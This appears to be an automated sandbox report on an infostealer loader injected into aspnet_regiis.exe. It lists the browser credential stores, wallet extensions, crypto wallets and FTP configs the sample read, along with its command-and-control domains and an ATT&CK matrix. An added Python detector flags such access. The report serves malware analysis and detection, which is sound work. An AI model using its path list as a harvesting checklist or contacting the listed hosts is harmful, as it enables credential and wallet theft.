Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: Yara match | File source: 00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 5780, type: MEMORYSTR
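The rows above show the security-relevant pattern of this sample: one injected host process, aspnet_regiis.exe, reads browser credential stores (Login Data, Web Data, cookies, History, Firefox key4.db/logins.json/cert9.db), the Local/Sync Extension Settings directories of wallet extensions, desktop wallet directories (Exodus, Ledger Live, atomic, Coinomi, Bitcoin, Binance, Jaxx, Electrum, Guarda) and FTP client configuration, all in a single run. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample, that turns those paths into a detection check over a feed of (process image, opened path) events: each path is classified into one of four categories, the process that legitimately owns a category is ignored, and any other process that touches two or more categories is reported. The sample events are constructed from the paths in this report (plus two benign rows); the category patterns, the allowlist and the two-category threshold are the example's own assumptions.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Dict, List, Optional, Tuple

# Host process the report shows the stealer injected into (real path on Windows).
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

# Constructed sample events in (process image, opened path) form, built from the
# paths listed in this report plus two benign rows: a browser reading its own
# store, and aspnet_regiis.exe touching a .NET config file it normally handles.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (ASPNET, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (ASPNET, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db"),
    (ASPNET, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    (ASPNET, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (ASPNET, r"C:\Users\user\AppData\Roaming\FTPRush"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (ASPNET, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config"),
]

# Categories of on-disk secrets seen in the report. Patterns (assumed for this
# example) are anchored on the path tail and matched case-insensitively.
CATEGORIES: Dict[str, List[str]] = {
    "browser_credentials": [
        r"\\(Login Data|Login Data For Account|Web Data|History)$",
        r"\\Network\\Cookies$",
        r"\\(cookies|places|formhistory)\.sqlite$",
        r"\\(logins\.json|key4\.db|cert9\.db)$",
    ],
    # Chromium extension IDs are 32 letters from a-p.
    "extension_storage": [r"\\(Local|Sync) Extension Settings\\[a-p]{32}$"],
    "crypto_wallet": [
        r"\\Exodus\\exodus\.wallet$", r"\\Ledger Live$",
        r"\\atomic\\Local Storage\\leveldb$", r"\\Coinomi\\Coinomi\\wallets$",
        r"\\Bitcoin\\wallets$", r"\\Binance$", r"\\com\.liberty\.jaxx\\IndexedDB$",
        r"\\Electrum(-LTC)?\\wallets$", r"\\Guarda\\IndexedDB$",
    ],
    "ftp_client_config": [
        r"\\FTPbox$", r"\\SmartFTP\\Client 2\.0\\Favorites$", r"\\FTPGetter$",
        r"\\FTPInfo$", r"\\SiteDesigner\\3D-FTP$", r"\\FTPRush$",
    ],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats]
            for cat, pats in CATEGORIES.items()}

# Processes that legitimately own a category (assumption for the example):
# browsers may read their own stores; wallet and FTP apps are not modelled, so
# every access to those categories is reported.
ALLOWED: Dict[str, set] = {
    "browser_credentials": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "extension_storage": {"chrome.exe", "msedge.exe"},
}


def classify(path: str) -> Optional[str]:
    """Return the secret category a path belongs to, or None if it is not one."""
    for cat, pats in COMPILED.items():
        if any(p.search(path) for p in pats):
            return cat
    return None


def process_name(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def suspicious_access(events) -> Dict[str, Dict[str, List[str]]]:
    """Map image -> category -> paths for accesses by a non-owning process."""
    hits: Dict[str, Dict[str, List[str]]] = defaultdict(lambda: defaultdict(list))
    for image, target in events:
        cat = classify(target)
        if cat is None or process_name(image) in ALLOWED.get(cat, set()):
            continue
        hits[image][cat].append(target)
    return hits


def stealer_candidates(events, min_categories: int = 2) -> Dict[str, List[str]]:
    """One process reading browser secrets *and* wallet/FTP data is the stealer
    pattern; report images that hit at least `min_categories` categories."""
    return {img: sorted(cats) for img, cats in suspicious_access(events).items()
            if len(cats) >= min_categories}


if __name__ == "__main__":
    for img, cats in stealer_candidates(SAMPLE_EVENTS).items():
        print(f"{img}: {', '.join(cats)}")
```

Feed it (image, path) pairs from telemetry that records file opens for reading, such as Windows Security event 4663 with a SACL on the profile and wallet directories, or an EDR's file-read events; Sysmon's file events cover creates and deletes, not reads, so they would not see this access. The process check is on the image name only, so a stealer that injects into the browser itself would pass the allowlist and needs a parent-process or injection signal instead.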

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 5780, type: MEMORYSTR
Source: Yara match | File source: 3.2.aspnet_regiis.exe.2760000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R3nz_Loader.exe.6cf01000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R3nz_Loader.exe.6cf01000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R3nz_Loader.exe.6cee0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R3nz_Loader.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one row per matrix row; a leading number is the report's signature-count badge for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 311 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 11 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 33 System Information Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 251 Security Software Discovery | Distributed Component Object Model | 3 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 23 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 23 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior graph legend (graph image not included in this export): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Source | Detection | Scanner | Label
R3nz_Loader.exe | 34% | ReversingLabs | Win32.Dropper.Genie
R3nz_Loader.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\gdi32.dll | 100% | Joe Sandbox ML |
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label
https://fancywaxxers.shop/YB | 100% | Avira URL Cloud | malware
rabidcowse.shop | 100% | Avira URL Cloud | malware
wholersorie.shop | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/api9Bd | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/api_ | 100% | Avira URL Cloud | malware
fancywaxxers.shop | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/apiAB | 100% | Avira URL Cloud | malware
cloudewahsj.shop | 100% | Avira URL Cloud | malware
http://147.45.47.81/conhost.exe | 0% | Avira URL Cloud | safe
https://fancywaxxers.shop/X | 100% | Avira URL Cloud | malware
noisycuttej.shop | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/int32 | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/api | 100% | Avira URL Cloud | malware
framekgirus.shop | 100% | Avira URL Cloud | malware
nearycrepso.shop | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/ | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/n | 100% | Avira URL Cloud | malware
abruptyopsn.shop | 100% | Avira URL Cloud | malware
tirepublicerj.shop | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fancywaxxers.shop | 104.21.32.1 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
rabidcowse.shop | true | Avira URL Cloud: malware | unknown
wholersorie.shop | true | Avira URL Cloud: malware | unknown
fancywaxxers.shop | true | Avira URL Cloud: malware | unknown
cloudewahsj.shop | true | Avira URL Cloud: malware | unknown
noisycuttej.shop | true | Avira URL Cloud: malware | unknown
nearycrepso.shop | true | Avira URL Cloud: malware | unknown
https://fancywaxxers.shop/api | true | Avira URL Cloud: malware | unknown
framekgirus.shop | true | Avira URL Cloud: malware | unknown
tirepublicerj.shop | true | Avira URL Cloud: malware | unknown
abruptyopsn.shop | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fancywaxxers.shop/api_ | aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
